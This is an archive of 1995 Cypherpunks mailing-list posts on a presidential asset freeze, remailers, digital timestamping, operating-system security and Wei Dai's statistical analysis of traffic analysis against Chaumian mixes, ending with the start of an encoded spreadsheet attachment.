From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joshua geller <joshua@dee.retix.com>
Date: Tue, 24 Jan 95 10:35:09 PST
To: cypherpunks@toad.com
Subject: Clinton freezes U.S. assets of Mideast groups
Message-ID: <199501241834.KAA13284@sleepy.retix.com>
MIME-Version: 1.0
Content-Type: text/plain



here's something I found in my mailbox:

___
	 WASHINGTON (Reuter) - President Clinton has ordered a freeze
on the U.S. assets of 12 Middle East ``terrorist'' groups, the
White House said Tuesday.
    White House spokesman Mike McCurry said Clinton had signed
an executive order ``to block the assets in the United States of
certain terrorist organizations that threaten to disrupt the
peace process'' in the Middle East.
	 ``The action will specifically prohibit certain kinds of
financial transactions with these groups,'' McCurry said.
	 The groups include Hamas, Hizbollah, Islamic Jihad, Abu
Nidal, Black September, the Fatah Revolutionary Council, Kach,
the Palestine Liberation Front, and the Islamic Group, McCurry
said.
	 He did not name the others, but said there would be more
information released at a 2 p.m. EST White House briefing with
officials from the Treasury, State and Justice departments and
the National Security Council.
	 Under the order, charitable contributions to these groups in
the United States will also be blocked, McCurry said. He said
Clinton had also frozen the U.S. assets of 18 individuals
suspected of involvement in Middle East terrorism, but McCurry
did not name them.
	 Clinton signed the order Monday night and it took effect at
midnight EST the same day, McCurry said. He said the president
acted under the authority of the International Emergency
Economic Powers Act.
	 Clinton plans to discuss the matter in his State of the
Union address to Congress Tuesday night, McCurry said.
	 ``One of the things the president will address in the State
of the Union tonight is the  new world in which we live, in
which there are new types of threats to our security and to
global security,'' he told reporters in his office.
	 ``We just had a very painful and tragic reminder of that in
Israel in recent days, and that's the impact of terrorism,''
McCurry said, referring to a weekend terrorist bombing that
killed 18 Israeli soldiers and a civilian. Islamic Jihad claimed
responsibility for the bombing.
    McCurry said the decision was the result of a detailed and
lengthy review within the U.S. government of how to combat
terrorism. The goal was to make it harder for these groups to
finance their activities by cutting off their  U.S. sources of
support and blocking their access to the U.S. financial system,
he said.
	  Clinton is also preparing anti-terrorist legislation,
McCurry said.
	 ``We do need additional legislation that would further
assist the efforts to combat terrorism, and the president will
soon send the Congress a comprehensive anti-terrorism package
that would stregnthen our ability to prevent terrorist acts, to
identify those who perpetrate violent acts and bring them to
justice,'' McCurry said.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Banisar <tc@phantom.com>
Date: Tue, 24 Jan 95 07:46:16 PST
To: Harry Bartholomew <bart@netcom.com>
Subject: Re: DOJ Computer Seizure Guidelines
In-Reply-To: <199501241124.DAA24739@netcom17.netcom.com>
Message-ID: <Pine.3.89.9501241047.B21387-0100000@mindvox>
MIME-Version: 1.0
Content-Type: text/plain



Actually we didnt have to sue them for once to get it. I guess 
they wanted to make it public. The encryption section is interesting. 
They seem to be admitting that there are 5th amendment issues related to 
disclosing your key and that they may have to immunize people before 
forcing them to give their keys up.

Dave


On Tue, 24 Jan 1995, Harry Bartholomew wrote:

> 
>     Seen on comp.society.privacy.  This document was obtained
>     by an FOIA suit by EPIC. I ftp'd from the cpsr.org but even
>     at 2:30 a.m. PST the 315 Kbytes took an excruciating 481 seconds.
> 
>     For those on netcom its on /ftp/pub/ba/bart easily available,
>     if others can get through to ftp.netcom.com at least the
>     transfer might be faster than cpsr.
> 
>     Encrypted information is dealt with on pps 54-55 in particular.
>     I'll leave conclusions to our lawyerly types.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Mon, 23 Jan 95 15:53:08 PST
To: cypherpunks@toad.com
Subject: Re: Anti-porn conference in Manila
In-Reply-To: <Pine.3.89.9501222311.A9801-0100000@netcom19>
Message-ID: <Pine.SUN.3.91.950124104650.28961G-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Jan 1995, James A. Donald wrote:

> Church of England in Australia was, and I believe still is, government 
> funded by the Australian government.

As are many other schools of various religious persuasions.  So?

> Furthermore when my kids went to government school in NSW, Australia,
> they were taught Church of England religion by my neighbor, Mrs Law, 
> in school, in the classroom.  

It's not compulsory - as an avowed atheist I always avoided them.

> If it quacks like a duck ...

Not necessarily...  If they fund one school, they can hardly refuse
to fund others.

> I was unaware of the portion of the constitution that you mention.

Obviously - it's handy having an on-line copy of the Australian
Constitution.  Anyone want a copy?  I don't run an FTP site.

> I suspect that the government and the church are none to clear on it
> either.

You might be amused to know that our Governor-General (the "Queen's Man")
is himself an avowed atheist - is it likely he would have been appointed
by a pro-religious government?

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Tue, 24 Jan 95 11:58:38 PST
To: joshua geller <joshua@dee.retix.com>
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <199501241834.KAA13284@sleepy.retix.com>
Message-ID: <Pine.3.89.9501241122.A12422-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


The Eurodollar market got started because Russia feared 
arbitrary confiscation of its dollar bank accounts.

In the West, we see governments arbitrarily and
capriciously stealing financial assets.

As a result first world banking no longer has a large
advantage over third world banking.

This will eventually inject serious money into cyberspace
financial institutions -- once they exist, run smoothly,
have credible audit trails and a reputation.

At present it seems to me that unix machines on the internet
are intrinsicly insecure -- the methods used to secure them
are a collection of ad hoc patches.  For example all
unix machines are vulnerable to the trojan
horse attack.

(I expect the usual flame from Perry that I am stupifyingly
ignorant and that that is all fixed or will be shortly 
-- no Perry it is not all fixed -- it cannot be fixed.  
The necessary fixes have to be designed in at the
beginning.)

In consequence finance software running on the internet is
only acceptable for small time stuff.

Windows NT is supposedly secure.  Certainly its design makes
it possible to write software that is intrinsicly secure,
rather than creating a particular fix for each particular
hole.   The perimeter you have to defend is much smaller
and easier to explore.

On the other hand existing Unix security is probably
adequate for immediately proposed uses of internet
money -- selling beads and trinkets.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 24 Jan 95 12:36:27 PST
To: Brad Dolan <bdolan@well.sf.ca.us>
Subject: Re: Here's what will happen to U.S. based remailers
Message-ID: <v01510101ab4b13590a65@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:11 AM 1/24/95, Brad Dolan wrote:
>I just got a call.  Supposedly Clinton just pulled an executive order
>out of his navel last night, confiscating the assets of 12 "terrorist
>groups" and 18 disfavored people.  CNN is reporting a few of the names,
>but not all.  The ones they mention are associated with groups like
>"Islamic Jihad".  These groups are hard to defend, but if he can do it
>to them today, he can do it to you tomorrow.
>
>My old German acquaintance says that Hitler used to do this, issuing
>midnight decrees to seize property, make new prohibitions, etc.

Many years ago, I read a poem by a German priest that stated that the Nazis
first start with the groups that nobody likes, then those that most people
don't like, until at last they knock on your door.

The more things change, the more they stay the same?



-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joshua geller <joshua@dee.retix.com>
Date: Tue, 24 Jan 95 12:54:56 PST
To: slowdog@chewy.wookie.net
Subject: Re: Clinton's Executive Order
In-Reply-To: <Pine.LNX.3.91.950124152256.23455A-100000@chewy.wookie.net>
Message-ID: <199501242054.MAA13425@sleepy.retix.com>
MIME-Version: 1.0
Content-Type: text/plain



>   Anyone know just what the International Emergency Economic Powers Act is, 
>   and what else a President could in theory do with it?

the president can do just about anything he wants with an executive
order. of course if he did certain things he would be likely to get
impeached, or challenged in the courts.

theoretically, what with being commander in chief of the armed forces,
the president can do anything he wants up to and including the declaration
of martial law.

I don't expect that to happen this year.

josh









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@myriad.pc.cc.cmu.edu (Matthew Ghio)
Date: Tue, 24 Jan 95 12:59:59 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
In-Reply-To: <9501232220.AA18684@anchor.ho.att.com>
Message-ID: <199501242057.MAA06586@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199501240400.UAA20706@largo.remailer.net> you write:
>   From: wcs@anchor.ho.att.com
>
>   Tim writes:
>   > One thing I should've noted is that a Linux-based cheap remailer is
>   > mostly useless without a "live connection" to the Net. 
>
>   I disagree - live connections  are great for fast-response systems,
>   but we got along just fine in the uucp dialup world with occasional
>   connections; 
>
>And if get someone to do secondary MX for you that _is_ fulltime
>connected, then the only latency for mail is the poll time.

I offer to MX, store and forward mail for anyone who wants to run
a remailer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@vail.tivoli.com (Mike McNally)
Date: Tue, 24 Jan 95 13:17:29 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <199501241834.KAA13284@sleepy.retix.com>
Message-ID: <9501242116.AA04128@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain



James A. Donald writes:
 > For example all unix machines are vulnerable to the trojan
 > horse attack.

*The* trojan horse attack?  I'm not sure I understand that
phraseology; it (methinks, perhaps out of confusion) seems like saying
that JFK International is vulnerable to attack by the terrorist.

| GOOD TIME FOR MOVIE - GOING ||| Mike McNally <m5@tivoli.com>       |
| TAKE TWA TO CAIRO.          ||| Tivoli Systems, Austin, TX:        |
|     (actual fortune cookie) ||| "Like A Little Bit of Semi-Heaven" |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@chewy.wookie.net>
Date: Tue, 24 Jan 95 12:23:43 PST
To: cypherpunks@toad.com
Subject: Clinton's Executive Order
Message-ID: <Pine.LNX.3.91.950124152256.23455A-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


Anyone know just what the International Emergency Economic Powers Act is, 
and what else a President could in theory do with it?


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kkirksey@world.std.com (Ken Kirksey)
Date: Tue, 24 Jan 95 12:43:32 PST
To: cypherpunks@toad.com
Subject: Money and Banking
Message-ID: <199501242043.AA18840@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


Message-Id: <v01510103ab4996dfb4fc@DialupEudora>

This came to me from the Laissez Faire mailing list.   Looks like this
book might present a good case for non-government e-cash.

Ken

----------------------------------------------

A powerful case for "free banking"--
government failure far worse than market failure

MONEY AND BANKING
The American Experience
George Edward Durell Foundation
introduction by Clifford F. Thies
(reviewed by Jim Powell)

     This comprehensive history of American banking helps show
why the most serious monetary crises occur because of government
failures, not market failures. Consequently, we need less
government intervention in banking, not more. Ultimate objective:
"free banking" which would enable everyone to be best-protected
by open competition.
     Contributors here include many leading lights of "free
banking" scholarship and central bank criticism: Kevin Dowd,
Jeffrey Rogers Hummel, Dwight Lee, J. Huston McCulloch, Joseph T.
Salerno, Anna J. Schwartz, George A. Selgin, Richard Timberlake
and Lawrence H. White. Their papers--10 altogether--were
originally presented at the 1990 Durell Conference on Money and
Banking.
     They cover the entire history of banking in the United
States. They show why, contrary to conventional dogmas, "free
banks" were remarkably dependable and gained widespread
acceptance for their banknotes... how private bank clearinghouse
associations helped maintain overall stability while disciplining
bad bankers.
     The authors go on to make clear why banking crises resulted
from government intervention... how states undermined "free
banks" by forcing them to load up with state government debt,
often defaulted on... four ways Civil War era federal banking
laws hobbled the U.S. banking system... how government-enforced
unit banking (no branches permitted) promoted bank failures,
especially in agricultural and mining regions... why government
deposit insurance triggered conflagrations of corruption and
banking crises... why U.S. banking was decidedly more stable
before the advent of the Federal Reserve System--and how it
caused chronic inflation as well as crushing depression.
     This book shares many other revealing insights as well. For
example, why the Supreme Court once ruled that legal tender laws
violate the Fifth Amendment... how, despite their wretched
failures, Federal Reserve officials successfully lobbied for even
more power over banking and the economy. Excellent material here.

     "Virtually all major monetary and banking problems in U.S.
history appear to have their root cause in government
interference of some sort. The major historical banking problems--
banking instability before the Civil War, banking instability,
recurrent financial crisis, the inelastic currency, and the
stunted growth of U.S. banking after the Civil War; the banking
instability of the 1920's and the banking collapses of the
1930's, and the failures of historical and contemporary liability
insurance schemes--can all be traced to a great or lesser extent
to government interference in banking."
--Kevin Dowd in *Money and Banking*

Book No. CB6245 (hardcover) 271p.    publisher's price $59.50
                              LAISSEZ FAIRE PRICE ONLY $29.95

-------------------------------------------------------------------
Please send this review to anyone who you think might be interested
-------------------------------------------------------------------

*Money and Banking* will be available from Laissez Faire this week.  You 
can order it now.  Call toll-free 1-800-326-0996 or (415) 541-9780, fax 
(415) 541-0597 or write to: Laissez Faire Books, Dept. L41, 938 Howard 
St., #202, San Francisco, CA, 94103.  To order via E-MAIL: Simply reply to 
LFB@panix.com, or write to Eric Shoemaker, our customer service manager, at 
74741.2631@compuserve.com.  For your security, you might want to first 
call and leave us your credit card information and mailing address. (If 
you're already a customer we probably have it.)  After that you can 
order at anytime by e-mail using only your name and the zip code of the 
address we have on file. (Your zip code will verify your identity.)  We 
will process your order using the card and address we have. (If you 
would prefer to pay by check, you can join our pay-in-advance book club, 
and order in the same way. Call or e-mail for details.)

* Every order comes with a surprise free gift
* 30-day money back guarantee

You can pay for your order with a Visa, MasterCard, or Discover, or with 
a check or money order.  Include $4.35 for shipping.  California  
residents must include sales tax.

If you have any questions or comments, feel free to let me know.



Thanks,

Chris

-------------------------------------------------------
Chris Whitten                             LFB@panix.com 
Laissez Faire Books                      1-800-326-0996
---The world's largest selection of books on liberty---
-------------------------------------------------------
Ask me about free Book News e-mail list, print catalog,
http://www.xmission.com/~legalize/lf/Laissez-Faire.html
-------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@chewy.wookie.net>
Date: Tue, 24 Jan 95 12:58:39 PST
Subject: Re: Clinton's Executive Order
In-Reply-To: <199501242054.MAA13425@sleepy.retix.com>
Message-ID: <Pine.LNX.3.91.950124155749.23538A-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Jan 1995, joshua geller wrote:

> >   Anyone know just what the International Emergency Economic Powers Act is, 
> >   and what else a President could in theory do with it?
> 
> the president can do just about anything he wants with an executive
> order. of course if he did certain things he would be likely to get
> impeached, or challenged in the courts.
> 
> theoretically, what with being commander in chief of the armed forces,
> the president can do anything he wants up to and including the declaration
> of martial law.

Yes I understand all this. But what specifically is the IEEP Act?


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Tue, 24 Jan 95 14:17:52 PST
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Here's what will happen to U.S. based remailers
In-Reply-To: <v01510101ab4b13590a65@[192.0.2.1]>
Message-ID: <Pine.SV4.3.91.950124161239.1512A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 24 Jan 1995, Lucky Green wrote:

> Many years ago, I read a poem by a German priest that stated that the Nazis
> first start with the groups that nobody likes, then those that most people
> don't like, until at last they knock on your door.
> 
> The more things change, the more they stay the same?

Is this the poem, Lucky?

     They [Nazis] came first for the Communists,
and I didn't speak up because I wasn't a Communist.
     Then they came for the Jews, 
and I didn't speak up because I wasn't a Jew.
     Then they came for the Catholics, 
and I didn't speak up because I was a Protestant.
     Then they came for me,
and by that time there was no one left to speak up.
                         - Martin Niemller

Seems appropriate lately, doesn't it?

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@myriad.pc.cc.cmu.edu (Matthew Ghio)
Date: Tue, 24 Jan 95 13:27:17 PST
To: cypherpunks@toad.com
Subject: new domain name for mg5n+alias@andrew.cmu.edu
Message-ID: <m0rWsmN-0006UUC@myriad.pc.cc.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Addresses on my alias server of the form
mg5n+alias!username@andrew.cmu.edu, can now also be reached at
username@wormhole.jpunix.com.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Tue, 24 Jan 95 13:35:30 PST
To: cypherpunks@toad.com (Cypherpunks List)
Subject: Re: Shell's authentication needs
In-Reply-To: <9501211317.AA00188@sulphur.osf.org>
Message-ID: <199501242136.QAA02364@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Rich Salz writes:
> Shell needs public key because they want to use email for legal contracts.
> They've been waiting for standards to come around, but have given up.
> They're currently planning on using NIST's DSS, if they can fix a few things:
>     -	Add concepts of time and location (it can be important to prove
> 	that this was signed last month outside of the U.S.)

Any thoughts on how digital "place-stamping" (analogous to timestamping) might
be accomplished, to authenticate the location of origin of a document ?

 -L. McCarthy / seeking a summer job/internship; BS CS Cornell & 2 years'
  grad work in theoretical CS (algebraic algorithms); private email for info



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Tue, 24 Jan 95 16:19:35 PST
To: cypherpunks@toad.com
Subject: CP archives?
Message-ID: <m0rWvRj-0004JGC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


Can anyone tell me where the CP mailing list is archived?  Thanks!
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Ramstad <rramstad@nfic.com>
Date: Tue, 24 Jan 95 15:02:57 PST
To: cypherpunks@toad.com
Subject: wall street journal television piece
Message-ID: <9501242300.AA00958@www.nfic.com>
MIME-Version: 1.0
Content-Type: text/plain



wall street journal television is looking for someone who can talk to
them (anonymously if necessary) about computer system security,
specifically, breaking in.  ideally they are looking for someone who
can appear on camera in NYC (again, anonymously if necessary) for a
taping in the next day or two.

this is apparently in response to a recent New York Times article
about a christmas day break in.  the person doing the piece has an
email address which i'll pass on to anyone who wants to talk with her.
she has indicated that she is interested in getting the big picture,
though anything is possible with the press, she sounds like she is
hoping to desensationalize / make more realistic some of the
inaccurate info in the NYT.

please contact me if you are interested, and i'll forward email on to
her so she can get back to you.  feel free to use any of the anonymous
email remailer services if that is appropriate.

i'm not on this list, apologies if this is inappropriate, and please
cc me on any relevant communication.  yowsa.

-- Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Tue, 24 Jan 95 15:07:49 PST
To: cypherpunks@toad.com
Subject: Archive of Remailer-Operators List Begun
Message-ID: <199501242308.SAA02649@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I have begun an archive of the remailer-operators list. I've just placed a
gzipped file containing the traffic from the last couple of weeks, plus some
scattered previous traffic, in //ftp.csua.berkeley.edu/incoming. If/when I
learn the ultimate fate of this file, I'll provide further details.

 -L. Futplex McCarthy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Tue, 24 Jan 95 15:31:16 PST
To: cypherpunks@toad.com (Cypherpunks List)
Subject: Re: Shell's authentication needs
Message-ID: <ab4b3db603021004cb5d@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:36 PM 01/24/95, L. McCarthy wrote:
>Rich Salz writes:
>> Shell needs public key because they want to use email for legal contracts.
>> They've been waiting for standards to come around, but have given up.
>> They're currently planning on using NIST's DSS, if they can fix a few things:
>>     - Add concepts of time and location (it can be important to prove
>>       that this was signed last month outside of the U.S.)
>
>Any thoughts on how digital "place-stamping" (analogous to timestamping) might
>be accomplished, to authenticate the location of origin of a document ?

Well, it clearly can't be done over the internet.   But it's really just a
matter of putting a "place" field within the signature, in addition to the
"time" one.   And you'd have to trust the "stamper" to only stamp stuff as
"Cleveland" that he had a way of knowing was in Cleveland. It's really up
to him to figure out a way of verifying that. Maybe American Express
offices will start place/time stamping, and you have to physically go to
the AE office in Cleveland OH where someone takes your file and place/time
stamps it.
It's not as elegant as time stamping, because you really need face-to-face
contact. And you need to trust the stamper not to lie about his location (I
can't remember how much you need to trust a time-stamper, but I think it's
less).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 24 Jan 95 15:36:19 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <Pine.3.89.9501241122.A12422-0100000@netcom10>
Message-ID: <9501242335.AA14267@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"James A. Donald" says:
> At present it seems to me that unix machines on the internet
> are intrinsicly insecure -- the methods used to secure them
> are a collection of ad hoc patches.  For example all
> unix machines are vulnerable to the trojan
> horse attack.
> 
> (I expect the usual flame from Perry that I am stupifyingly
> ignorant and that that is all fixed or will be shortly 
> -- no Perry it is not all fixed -- it cannot be fixed.  

Actually, I would be curious to find out from James what the hell he's
talking about. Yes, if you get a priv'ed user to run a program it can
do anything. Thats the case in all operating systems that I know of.

> Windows NT is supposedly secure.

And my mother is a bicycle.

NT is about as secure as VMS was, i.e. not at all. Its just got
different bugs.

> Certainly its design makes it possible to write software that is
> intrinsicly secure, rather than creating a particular fix for each
> particular hole.

You mean, it makes proof of security possible for real programs? That
there is a proof of security available for the NT kernel? I'd settle
for a proof of non-crashing myself. Short of that I'm unaware of any
system that is "intrinsically" secure.

Now, I don't believe, in general, in flaming people for gross
ignorance, but it seems that Mr. Donald believes that there is some
sort of design flaw in Unix that makes it "inherently insecure". I
have no idea what this flaw might be. I know that Unix suffers from
the same problem all other operating systems from MVS to VMS to NT to
whatever else you can name suffer from -- bugs that make it possible
to break the system. If Mr. Donald can name an operating system that
has some sort of systematic way to make it secure that he knows of --
in other words, a formal proof of security of the system (i.e. an A1
secure system by the formal nomenclature), I'll happily hear about it
from him for the first time. Certainly my teachers never heard of such
a thing, and neither have I.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Tue, 24 Jan 95 18:44:20 PST
To: Jonathan Rochkind <jrochkin@cs.oberlin.edu>
Subject: Re: Shell's authentication needs
In-Reply-To: <ab4b3db603021004cb5d@[132.162.201.201]>
Message-ID: <Pine.3.89.9501241855.A1068-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Jan 1995, Jonathan Rochkind wrote:
> It's not as elegant as time stamping, because you really need face-to-face
> contact. And you need to trust the stamper not to lie about his location (I
> can't remember how much you need to trust a time-stamper, but I think it's
> less).

You do not need to trust the time stamper at all, because from time
to time he publishes a one way checksum of everything he has
time stamped, or rather the audit trail for everything he
has time stamped.

So if the credibility of his stamp is questioned he just produces
the audit trail, and you know that the audit trail must have 
been created at the time claimed, because its checksum was
published at the time claimed.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Tue, 24 Jan 95 16:52:00 PST
To: cypherpunks@toad.com
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <9501242335.AA14267@snark.imsi.com>
Message-ID: <Pine.3.89.9501241802.B6207-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain


Now that the damage is done, (the assets frozen) I hope that all the
good black-marketers kept enough to keep them online, till the groups
can manage to sell some more oil. (Anyone ever price snake oil?)

Meanwhile, a national emergency, could ultimately force one that uses
PGP to have to either work for the Defense Dept. or a related company
that serves the Dept. directly. The Gulf War didn't cause any ripples,
but then PGP was in its infancy then. If they want to limit usage, it
sure looks like a good way to start.

Carol Anne

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Tue, 24 Jan 95 19:05:11 PST
To: cypherpunks@toad.com
Subject: analysis of Chaum's MIX continued
Message-ID: <199501250304.AA05794@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3925.1071713475.multipart/mixed"

--Boundary..3925.1071713475.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

-----BEGIN PGP SIGNED MESSAGE-----

Last week I wrote about a way to trace who Alice, 
using a Chaumian mix, is writing to, by calculating a score 
for each user based on the number of times the receipt of a 
message by the mix from Alice is followed by a transmit to 
the user during the output phase of that batch (I need a 
name for these occurences... any sugestions?).  Does 
this method actually work?  Well, let's see...

(Let me note that this method of traffic analysis can be 
applied to any Chaum type MIX, even if the MIX uses random 
delays instead of batches.  It can even be used on entire 
MIX-nets, by treating the MIX-net as a single large mix.  
However, I have to make several assumptions in the 
following analysis of how well this method works.  This 
doesn't mean that it won't work outside those assumptions, 
just that I don't know enough statistics to figure out how 
well it would work in a more general situation.  Maybe someone 
can give me a recommendation for a good statistics textbook?)

Let's assume:
1.  there is one mix which processes a batch every time it 
receives a certain number of messages
2.  there are N users
3.  all users send at most one message to the mix per 
batch, the probability that he will do so is S (I'm assuming 
every user sends the same number of messages per unit time 
on average, many of which can be dummies, and that the 
timing of these messages are random)
4.  all users receive at most one message from the mix per 
batch, with probability R (R<S or R>S depending on 
wheather the mix eats more dummy messages than it 
generates)

Alice and Bob (the targets of the traffic analysis) are 
simply two of those users.

5.  In a particular batch, there is a probability Q (Q<=R and Q<=S) 
that Alice will send a message to Bob.  This implies that 
for each batch in which Alice doesn't send a message to 
Bob, there is a probability of (S-Q)/(1-Q) that she will 
send some other message to the mix (which may be a dummy 
message or a message to someone else).  Similiarly, for each 
batch in which Bob doesn't receive a message from Alice, 
there is a probability of (R-Q)/(1-Q) that he will receive 
some other message from the mix.

Let T be the length of time (expressed in number of 
batches) since the start of the traffic monitoring
and let M(user) be the total number of times the receipt 
of a message by the mix from Alice is followed by a transmit 
to user during the output phase of that batch.

Note that the distribution of M is a binomial 
distribution B(T, R*S).  This means:
	mean of M = T*R*S
	standard deviation of M = sqrt(T*R*S*(1-R*S))

On the other hand,
	M(Bob) = T*Q + T(1-Q) * ((S-Q)/(1-Q)) * ((R-Q)/(1-Q))
		which simplifies to:
	M(Bob) = T * (Q + (S-Q)*(R-Q)/(1-Q))

Now, we can calculate a z-score for M(Bob) by subtracting 
from it the mean of M (this difference simplifies to 
T*Q*(1-S)*(1-R)/(1-Q) ) and dividing the difference by the 
standard deviation.  We can then find the standard normal 
probability p(z) associated with the z-score, and finally 
multiply 1-p(z) and the total number of users (N) to find how 
many users can be expected to have a larger M than Bob.  
Let's call this number A.

In conclusion:
                   T*Q*(1-S)*(1-R)/(1-Q)  
A = N * (1 - p ( ------------------------- ) )
                    sqrt(T*R*S*(1-R*S))   

It seems that as long as Q>0, S<1, and R<1, A converges to 
0 as T increases.  This means under the above assumptions, 
Bob will eventually be traced out if these 3 conditions are 
met.

Wei Dai

P.S.  If there aren't any serious mistakes in the above 
analysis, I may produce a table showing how long it would 
take for A to fall below 1 for various values of Q, R, 
S, and N.  Is there any interest in this?

For now, I've attached an Excel spreadsheet so you can try 
plugging numbers into the above formula.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyW/fzl0sXKgdnV5AQHQ/gP+LF/P19djHH5UpXfNQWPsljRTFZv9Bi/S
nHJZKVOHC+T5b4/JLHIbNMbH5xRiM4wKHmmpdAoqNRBfWQm+nlikXnuwXJYZemM3
OxAEPLHflMby6SRvrtvT5r+ajm1GVqgYc2JE4Dyz5zBNqBlto1DG0KFK+1MNdYEQ
CDUAK5GndnU=
=qRUF
-----END PGP SIGNATURE-----

This message contains a file prepared for transmission using the
MIME BASE64 transfer encoding scheme. If you are using Pegasus
Mail or another MIME-compliant system, you should be able to extract
it from within your mailer. If you cannot, please ask your system
administrator for help.

   ---- File information -----------
     File:  mix-anal.xls
     Date:  24 Jan 1995, 18:51
     Size:  14848 bytes.
     Type:  Binary


--Boundary..3925.1071713475.multipart/mixed
Content-Type: application/octet-stream; name="bin00000.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00000.bin"
Content-Description: "mix-anal.xls"

0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAOwADAP7/CQAGAAAAAAAAAAAAAAAB
AAAAAQAAAAAAAAAAEAAAAgAAAAEAAAD+////AAAAAAAAAAD/////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
